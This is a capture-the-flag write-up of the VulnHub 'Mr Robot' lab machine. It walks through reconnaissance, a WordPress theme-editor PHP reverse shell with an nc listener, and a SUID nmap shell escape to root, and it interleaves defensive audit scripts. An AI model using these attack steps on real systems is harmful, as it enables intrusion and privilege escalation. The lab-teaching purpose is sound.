VulnHub Write Up - Mr Robot
Vulnerable Machine:
Method:
- Scanned the network to discover the target
- Scanned ports and services on the target
- Scanned the web application for vulnerabilities and information
- Scanned for specific WordPress vulnerabilities
- Exploited WordPress by uploading a PHP reverse shell
- Used a misconfigured SUID bit to escalate privileges
Tools:
Useful links:
Write up:
The first step in any penetration test, whether network or web based, is intelligence gathering. With our attacking machine and the Mr Robot virtual machine both on the host-only network adapter, the first step was to scan the network for our target.
I ran an nmap scan with the -n flag to skip DNS resolution, as we are on a host-only network (the box is not connected to the internet; it is generally bad practice to have a vulnerable machine internet facing, for obvious reasons), with the -sn flag for host discovery, and used the * wildcard to scan every IP from 192.168.56.0 to 192.168.56.255:
root@Hazana:~# nmap -n -sn 192.168.56.*
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-12 15:30 GMT
Nmap scan report for 192.168.56.103
Host is up (0.00013s latency).
MAC Address: 08:00:27:A2:13:1F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00016s latency).
MAC Address: 08:00:27:CF:FB:C2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 6.98 seconds
As my machine is .103, and I know .100 is the host-only ethernet adapter, we have our target: .102.
Next was to scan the target for ports and services. The -A flag will probe for open ports, services and an OS fingerprint:
root@Hazana:~# nmap -A -n 192.168.56.102
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-12 15:31 GMT
Nmap scan report for 192.168.56.102
Host is up (0.00030s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:CF:FB:C2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.2
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 192.168.56.102
(Unfortunately the actual webpages were having problems displaying for me, but from checking the source code and from what I've read there is some fun stuff to explore.)
We can see it is running a web server. I like to use a tool called Nikto to scan for vulnerabilities and misconfigurations:
root@Hazana:~# nikto -h 192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2017-03-12 15:44:31 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.56.102/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-03-12 15:47:08 (GMT0) (157 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We can gather some useful things from the Nikto scan:
- The server is leaking ETags (CVE-2003-1418), meaning it is exposing sensitive information: inode numbers and PIDs
- We can brute force the server for file names because mod_negotiation is enabled with MultiViews
- It found /admin and /admin/index.html (an admin login page; we will remember this if we find any credentials) and two /wp-login.php pages, also useful if we find any credentials
- We also know the server is running WordPress, which often contains vulnerabilities
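The header-level findings above are easy to re-check from the server side. The script below is an added example, not part of the original write-up and not Nikto's code: it parses a constructed response header block modelled on what Nikto and WPScan reported for this host and flags the same classes of weakness (missing X-Content-Type-Options, X-Powered-By version disclosure, Apache file-based ETags, a TCN: list header signalling MultiViews, and cookies set without HttpOnly). The sample response and the finding strings are my own.

```python
"""Added example (not part of the original write-up or of Nikto): audit a
captured HTTP response header block for the weaknesses Nikto reported."""

# Constructed sample response, modelled on the Nikto and WPScan findings above.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Date: Sun, 12 Mar 2017 15:44:31 GMT
Server: Apache
X-Powered-By: PHP/5.5.29
X-Frame-Options: SAMEORIGIN
ETag: "29-52467010ef8ad"
TCN: list
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Content-Type: text/html; charset=UTF-8
"""


def parse_headers(raw):
    """Map lowercase header name -> list of values (a header may repeat)."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:  # [0] is the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def is_hex(s):
    """True if s is a non-empty string of hex digits."""
    return bool(s) and all(c in "0123456789abcdefABCDEF" for c in s)


def audit_headers(raw):
    """Return a list of findings (strings) in a fixed order."""
    h = parse_headers(raw)
    findings = []
    if "x-content-type-options" not in h:
        findings.append("missing X-Content-Type-Options (MIME sniffing possible)")
    if "x-frame-options" not in h and "content-security-policy" not in h:
        findings.append("missing X-Frame-Options / CSP frame-ancestors")
    for value in h.get("x-powered-by", []):
        findings.append("version disclosure: X-Powered-By: " + value)
    for value in h.get("etag", []):
        # Apache's FileETag builds the tag from hex fields joined by '-';
        # three fields means INode MTime Size, two means MTime/Size only.
        core = value[2:] if value.startswith("W/") else value
        fields = core.strip('"').split("-")
        if all(is_hex(f) for f in fields):
            if len(fields) == 3:
                findings.append("ETag exposes inode (FileETag INode): " + value)
            elif len(fields) == 2:
                findings.append("Apache file-based ETag, confirm FileETag excludes INode: " + value)
    if any(v.lower() == "list" for v in h.get("tcn", [])):
        findings.append("TCN: list, mod_negotiation MultiViews enabled (file name guessing)")
    for cookie in h.get("set-cookie", []):
        parts = [p.strip() for p in cookie.split(";")]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        name = parts[0].split("=", 1)[0]
        if "httponly" not in attrs:
            findings.append("cookie set without HttpOnly: " + name)
    return findings


if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_RESPONSE):
        print("[!]", finding)
```

On Apache the corresponding fixes are `Header always set X-Content-Type-Options "nosniff"`, `Options -MultiViews`, and `FileETag MTime Size` (or `FileETag None`); setting `expose_php = Off` in php.ini removes the X-Powered-By header.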
I decided to run WPScan, a WordPress security scanner. It gave us a lot of XSS issues, but those weren't going to be useful for us:
root@Hazana:~/MrRobot# wpscan --url 192.168.56.102
[+] URL: http://192.168.56.102/
[+] Started: Sun Mar 12 16:18:09 2017
[+] robots.txt available under: 'http://192.168.56.102/robots.txt'
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.56.102/xmlrpc.php
However, from this scan we can see /robots.txt is present. robots.txt is essentially a way of telling robots (crawlers) not to index these pages, so they won't show up in a Google search, for example. After browsing to /robots.txt we can see the disallowed entries:
User-agent: *
fsocity.dic
key-1-of-3.txt
After browsing to 192.168.56.102/key-1-of-3.txt we get our first key!
Key 1:
073403c8a58a1f80d943455fb30724b9
I then decided to check /fsocity.dic, which gave us a download. I opened it with gedit and it seems to be a word list. Using wc -l <file> in the terminal we can count the number of lines:
root@Hazana:~/MrRobot# wc -l fsocity.dic
858160 fsocity.dic
So a big wordlist!
I decided to go back and check what Nikto had found. I browsed to /admin/index.html and checked the source code:
/readme.html:
/wp-links-opml.php revealed the WordPress version, which may come in useful later:
/license.txt shows us:
"what do you just pull code from Rapid9 or some s@#% since when you become a script kitty?"
Which, if I recall, is a quote from Elliot in the show:
I almost missed it, but if you scroll down to the bottom of the /license.txt page you can see what looks like a base64-encoded string.
So I decoded it in my browser using the HackBar extension (check it out, I highly recommend it):
It decoded to elliot:ER28-0652. That looks like credentials, so we go back and try them on /wp-admin/, which we made a note of earlier:
Success!
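The credential in /license.txt was only hidden by base64, which is encoding, not encryption. As an added example (not part of the original write-up), here is a scan a site owner can run over the text files a web root serves to catch blobs that decode to something shaped like user:password. The sample file and the benign token are constructed; the leaked token is built from the credential the write-up recovered, and the file suffix list is an assumption.

```python
"""Added example (not part of the original write-up): find base64 blobs in
served text files that decode to something shaped like user:password."""
import base64
import binascii
import os
import re
import tempfile

# Runs of base64 alphabet long enough to be worth decoding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# user:password, as the string at the bottom of /license.txt turned out to be.
CRED_SHAPE = re.compile(r"^[A-Za-z0-9_.@-]{2,64}:[^\s:]{4,128}$")


def decode_candidates(text):
    """Yield (token, decoded) for tokens that are valid base64 and decode to printable ASCII."""
    for match in B64_TOKEN.finditer(text):
        token = match.group(0)
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            yield token, decoded


def find_credential_leaks(text):
    """Return [(token, decoded)] for blobs whose plaintext looks like a credential."""
    return [(t, d) for t, d in decode_candidates(text) if CRED_SHAPE.match(d)]


def scan_webroot(root, suffixes=(".txt", ".html", ".htm", ".js", ".css")):
    """Walk a document root and report leaks per file (suffix list is an assumption)."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffixes):
                path = os.path.join(dirpath, name)
                with open(path, "r", errors="replace") as fh:
                    hits = find_credential_leaks(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample: a license-style file with a benign base64 string in the
# middle and, at the very bottom, the encoding of the credential from the write-up.
BENIGN_TOKEN = base64.b64encode(b"This is not a secret").decode("ascii")
LEAKED_TOKEN = base64.b64encode(b"elliot:ER28-0652").decode("ascii")
SAMPLE_LICENSE = (
    "GNU GENERAL PUBLIC LICENSE\n"
    "Version 2, June 1991\n"
    + BENIGN_TOKEN + "\n"  # printable once decoded, but not credential-shaped
    "Everyone is permitted to copy and distribute verbatim copies\n"
    "\n\n" + LEAKED_TOKEN + "\n"
)


def demo():
    """Write the constructed sample into a temporary web root and scan it."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "license.txt"), "w") as fh:
        fh.write(SAMPLE_LICENSE)
    return {os.path.relpath(p, root): hits for p, hits in scan_webroot(root).items()}


if __name__ == "__main__":
    for path, hits in demo().items():
        for token, decoded in hits:
            print(path, token, "->", decoded)
```

The credential-shape filter keeps the noise down: long words, hashes and harmless encoded strings decode to nothing or to text without a colon, so only the genuinely credential-like plaintext is reported.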
Looking around, I noticed that under Appearance > Editor we can directly edit the theme's PHP code! Let's try to get a PHP reverse shell.
pentestmonkey have already written a great PHP reverse shell here, or you can download it in a terminal with:
git clone https://github.com/pentestmonkey/php-reverse-shell
Now we edit the script to put in our IP address:
Then copy and paste it into the WP editor:
Next we need to set up a netcat listener to wait for the connection; 1234 is the port number defined in the script:
root@Hazana:~# nc -nvlp 1234
listening on [any] 1234 ...
Then browse to the URL of the PHP file we edited, which makes the web server execute our script:
http://192.168.56.102/wp-content/themes/twentyfifteen/404.php
Bingo! A reverse shell!
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.102] 35697
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 16:56:26 up  1:35,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
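The theme editor turned an admin login into code execution because it writes arbitrary PHP into the web root. The script below is an added example, not code from the write-up, from WordPress or from pentestmonkey: it hashes a theme directory into a baseline and later reports files that changed, appeared or vanished, plus any file calling functions a template has no reason to use. The temporary directory layout, file contents and function list are constructed.

```python
"""Added example (not from the write-up, WordPress or pentestmonkey): detect
theme files that drift from a known-good baseline or call functions a
template has no business calling."""
import hashlib
import os
import re
import tempfile

# PHP calls that do not belong in a theme template (assumed list).
SUSPICIOUS_CALLS = re.compile(
    r"\b(fsockopen|proc_open|popen|exec|shell_exec|passthru|system|eval)\s*\(",
    re.IGNORECASE,
)


def build_baseline(root):
    """Map path (relative to root) -> sha256 for every .php file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    baseline[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return baseline


def audit_theme(root, baseline):
    """Compare the live tree with the baseline and grep each file for suspicious calls."""
    current = build_baseline(root)
    report = {"modified": [], "added": [], "missing": [], "suspicious": []}
    for rel, digest in current.items():
        if rel not in baseline:
            report["added"].append(rel)
        elif baseline[rel] != digest:
            report["modified"].append(rel)
        with open(os.path.join(root, rel), "r", errors="replace") as fh:
            hits = sorted({m.group(1).lower() for m in SUSPICIOUS_CALLS.finditer(fh.read())})
        if hits:
            report["suspicious"].append((rel, hits))
    report["missing"] = [rel for rel in baseline if rel not in current]
    for key in report:
        report[key].sort()
    return report


def demo():
    """Constructed scenario mirroring the write-up: the theme's 404.php is overwritten."""
    root = tempfile.mkdtemp()
    theme = os.path.join(root, "twentyfifteen")
    os.makedirs(theme)
    files = {
        "404.php": b"<?php get_header(); ?>\n<h1>Not found</h1>\n<?php get_footer(); ?>\n",
        "index.php": b"<?php get_header(); ?>\n<?php get_footer(); ?>\n",
    }
    for name, body in files.items():
        with open(os.path.join(theme, name), "wb") as fh:
            fh.write(body)
    baseline = build_baseline(root)  # taken while the theme is still clean
    # Constructed stand-in for a pasted shell: only the function names matter here.
    tampered = b"<?php\n$sock = fsockopen($host, $port);\nproc_open($cmd, $spec, $pipes);\n"
    with open(os.path.join(theme, "404.php"), "wb") as fh:
        fh.write(tampered)
    return audit_theme(root, baseline)


if __name__ == "__main__":
    for key, items in demo().items():
        print(key, items)
```

Run build_baseline() right after deploying a theme and store the result off-box; a scheduled audit_theme() then catches exactly the edit made in this write-up. Removing the editor altogether is simpler still: `define('DISALLOW_FILE_EDIT', true);` in wp-config.php hides Appearance > Editor and blocks file writes through the dashboard.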
Now we can navigate in our PHP reverse shell:
$
$ cd home
$ ls
robot
$ cd robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
Now we have an MD5 hash! We could crack it ourselves, but that might take a while, so let's submit it to CrackStation to see if they already have the hash in their database.
Great! We now have a username and a password:
robot:abcdefghijklmnopqrstuvwxyz
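The robot user's password came back in seconds because password.raw-md5 stored an unsalted MD5 of a string that sits in every wordlist. The following is an added example, not part of the write-up: it confirms that the hash in the file is the MD5 of the lowercase alphabet, shows why a precomputed table answers such hashes instantly, and contrasts a salted, iterated PBKDF2 store. The candidate list and the iteration count are my own choices.

```python
"""Added example (not part of the write-up): why an unsalted MD5 falls to a
lookup table, and what a password store should look like instead."""
import hashlib
import hmac
import os

# The hash from /home/robot/password.raw-md5 in the write-up.
RAW_MD5_FROM_WRITEUP = "c3fcd3d76192e4007dfb496cca67e13b"


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def lookup_table_hit(stored_hex, candidates):
    """Precompute MD5 for a candidate list and look the stored hash up directly.
    With no salt, one table answers the same hash for every user and every site;
    CrackStation simply holds a very large version of this dict."""
    table = {md5_hex(c): c for c in candidates}
    return table.get(stored_hex)


ITERATIONS = 600_000  # assumed work factor; raise as hardware allows


def hash_password(password, salt=None):
    """Salted, iterated PBKDF2-HMAC-SHA256, encoded together with its parameters."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Constructed candidate list standing in for a wordlist.
    wordlist = ["password", "letmein", "abcdefghijklmnopqrstuvwxyz"]
    print("raw md5 lookup:", lookup_table_hit(RAW_MD5_FROM_WRITEUP, wordlist))
    stored = hash_password("abcdefghijklmnopqrstuvwxyz")
    print("stored form:", stored)
    print("verify:", verify_password("abcdefghijklmnopqrstuvwxyz", stored))
```

The salt defeats the shared table (two stores of the same password differ) and the iteration count makes each guess cost real time, but neither rescues a password this weak against a targeted wordlist; a slow hash buys time, a strong password is what actually holds.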
Now we need to log in with these credentials; however, our PHP shell just won't cut it, so we can upgrade it using a simple trick with Python. Some extra reading on the difference between terminals, shells, ttys and consoles can be found here.
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
(su can be thought of as "switch user", so we can execute commands with the privileges of the robot user.)
Now we are logged in as robot!
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Key 2:
822c73956184f694993bede3eb39f959
Now let's enumerate the internals of this host. I always check to see if nmap is installed:
robot@linux:~$ nmap --help
nmap --help
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>
So, we have nmap installed, but it is a much older version... Anyhow, let's scan ourselves using nmap -A localhost:
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2017-03-12 17:14 UTC
Interesting ports on localhost (127.0.0.1):
(The 1659 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsFTPd 3.0.2
80/tcp   open  http    Apache httpd
443/tcp  open  ssl     Nessus security scanner
3306/tcp open  mysql
So, we have FTP and MySQL running, interesting!
The problem is that we have no credentials to access them; we could brute force them hoping for weak credentials, but I decided to have a further look around for clues:
robot@linux:/$ cd root
cd root
bash: cd: root: Permission denied
Hmm, perhaps some privilege escalation is in order.
There's a reason it is constantly drilled into us to keep our software up to date; I decided to check whether that old version of nmap had any known problems.
Essentially, we can find all files owned by root that have the SUID permission bit set (-perm -4000), and discard any errors to /dev/null:
robot@linux:/$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
We can see nmap is in there! It shouldn't have these permissions, so let's try to abuse them.
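A SUID audit is far more useful when its output is diffed against what the host should have, rather than eyeballed. As an added example (not from the write-up), the script below parses the find output shown above, compares it with a constructed baseline, and separately flags setuid-root binaries in locations where package managers normally do not install anything; live_suid_root() walks a real filesystem the way the find command does. The baseline set, the skip list and the location prefixes are assumptions to adjust per distribution.

```python
"""Added example (not part of the write-up): diff a host's setuid-root
inventory against a baseline and flag binaries in unpackaged locations."""
import os
import stat

# Constructed baseline: the write-up's find output minus the outlier. Tune per distribution.
EXPECTED_SUID_ROOT = {
    "/bin/ping", "/bin/umount", "/bin/mount", "/bin/ping6", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
    "/usr/lib/pt_chown",
}

# Directories where an admin or a 'make install', not the package manager, puts things.
UNPACKAGED_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/", "/srv/")

# The find output from the write-up, used here as constructed input.
FIND_OUTPUT = """\
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
"""


def parse_find_output(text):
    """One path per line, blanks ignored."""
    return {line.strip() for line in text.splitlines() if line.strip()}


def diff_suid(found, expected=EXPECTED_SUID_ROOT):
    """Entries not in the baseline, and baseline entries no longer present."""
    return {"unexpected": sorted(found - expected), "missing": sorted(expected - found)}


def in_unpackaged_location(found):
    """Setuid-root files under prefixes that packages normally leave alone."""
    return sorted(p for p in found if p.startswith(UNPACKAGED_PREFIXES))


def live_suid_root(roots=("/",)):
    """Walk the filesystem like the find command: regular files, setuid, owned by uid 0."""
    hits = set()
    skip = {"/proc", "/sys", "/dev", "/run"}  # pseudo filesystems, assumed skip list
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root):
            dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                    hits.add(path)
    return hits


if __name__ == "__main__":
    found = parse_find_output(FIND_OUTPUT)
    print("baseline diff:", diff_suid(found))
    print("unpackaged:", in_unpackaged_location(found))
```

Both checks single out /usr/local/bin/nmap. The fix on a real host is to drop the bit (`chmod u-s /usr/local/bin/nmap`) and update the package; if unprivileged users genuinely need raw-socket scans, file capabilities (cap_net_raw) grant that without handing over root.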
As this is an older nmap, we can start interactive mode with --interactive:
robot@linux:/$ nmap --interactive
nmap> !sh
!sh
(The !sh lets us escape to a shell with the privileges nmap has.)
# cd root
cd root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Just like that we can abuse the permission in our nmap shell and read the final key!
Key 3:
04787ddef27c3dee1ee161b21670b4e4
Hope you enjoyed my first write up, any questions or improvements let me know, thanks!